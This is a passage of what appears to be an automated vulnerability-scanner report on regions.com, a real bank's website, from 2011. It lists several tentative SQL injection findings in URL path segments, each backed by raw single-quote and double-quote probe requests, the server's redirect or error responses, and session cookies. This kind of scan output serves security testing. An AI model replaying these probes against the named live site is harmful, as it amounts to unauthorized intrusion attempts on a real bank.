User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:44:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/report_fraud.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2freport_fraud.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/report_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/privacy_security.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557010832:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:44:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.34. http://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/email_starting_net.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555429176:ss=1305555382886

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/email_starting_net.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2femail_starting_net.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/email_starting_net.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/online_banking_help.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555429176:ss=1305555382886

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.35. http://www.regions.com/personal_banking/get_started_autoloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_autoloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_autoloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555463799:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Set-Cookie: www.regions.com-http=R1402696235; path=/
Date: Mon, 16 May 2011 15:21:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_autoloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555463799:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.36. http://www.regions.com/personal_banking/get_started_cds.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_cds.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_cds.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_cds.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.37. http://www.regions.com/personal_banking/get_started_heloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_heloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555462492:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_heloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555462492:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:21 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.38. http://www.regions.com/personal_banking/get_started_heloc.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_heloc.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_heloc.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555457332:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_heloc.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555457332:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:20 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.39. http://www.regions.com/personal_banking/get_started_installmentloan.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_installmentloan.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_installmentloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555465061:ss=1305555382886

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/get_started_installmentloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555465061:ss=1305555382886

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:21:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.40. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/get_started_lifegreen_checking.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/get_started_lifegreen_checking.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/get_started_lifegreen_checking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fget_started_lifegreen_checking.rf">here</a>.</h2>
</body>
...[SNIP]...

Request 2

GET /personal_banking''/get_started_lifegreen_checking.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.41. http://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/loans_credit.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/loans_credit.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/loans_credit.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2floans_credit.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/loans_credit.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.42. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/online_banking_help.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
